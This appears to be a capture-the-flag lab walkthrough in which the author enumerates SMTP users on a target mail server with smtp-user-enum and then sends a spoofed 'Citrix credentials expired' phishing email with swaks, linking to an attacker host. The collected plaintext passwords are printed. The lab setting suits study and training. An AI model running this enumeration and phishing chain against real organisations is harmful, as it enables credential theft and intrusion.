15-SMTP
➜ Xen telnet exchange.htb.local 25
Trying 10.13.38.12...
Connected to exchange.htb.local.
Escape character is '^]'.
help
220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
HELO hi
250 Hello.
MAIL FROM: <hi@hello.com>
250 OK
RCPT TO: <someone@a.com>
250 OK
I ll use smtp-user-enum to enumerate users.
sudo apt install smtp-user-enum
➜ Xen smtp-user-enum -D humongousretail.com -U /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -t 10.13.38.12 -m 40 -M RCPT
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... RCPT
Worker Processes ......... 40
Usernames file ........... /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
Target count ............. 1
Username count ........... 8295455
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ humongousretail.com
######## Scan started at Sat Jan 20 11:02:22 2024 #########
10.13.38.12: sales@humongousretail.com exists
10.13.38.12: marketing@humongousretail.com exists
10.13.38.12: legal@humongousretail.com exists
I also tried with another wordlist and one more user.
➜ Xen smtp-user-enum -D humongousretail.com -U /usr/share/seclists/Usernames/Honeypot-Captures/multiplesources-users-fabian-fingerle.de.txt -t 10.13.38.12 -m 40 -M RCPT
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... RCPT
Worker Processes ......... 40
Usernames file ........... /usr/share/seclists/Usernames/Honeypot-Captures/multiplesources-users-fabian-fingerle.de.txt
Target count ............. 1
Username count ........... 26324
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ humongousretail.com
######## Scan started at Sat Jan 20 11:11:15 2024 #########
10.13.38.12: it@humongousretail.com exists
10.13.38.12: legal@humongousretail.com exists
10.13.38.12: marketing@humongousretail.com exists
10.13.38.12: sales@humongousretail.com exists
I ll try to phish users for citrix login. I ll use swaks.
swaks --from it@humongousretail.com --to sales@humongousretail.com --header "citrix Credentials expired" --body "citrix http://10.10.14.11/" --server humongousretail.com
Someone clicked the link :)
I got more creds when using the swaks command again.
Creds...
awardel: @M3m3ntoM0ri@
pmorgan: Summer1Summer!
jmendes: VivaBARC3L0N@!!!
Logged in
When clicking on the monitor on the left side it downloads a .ica file, before i download citrix 64 bit on my system. Lets download it.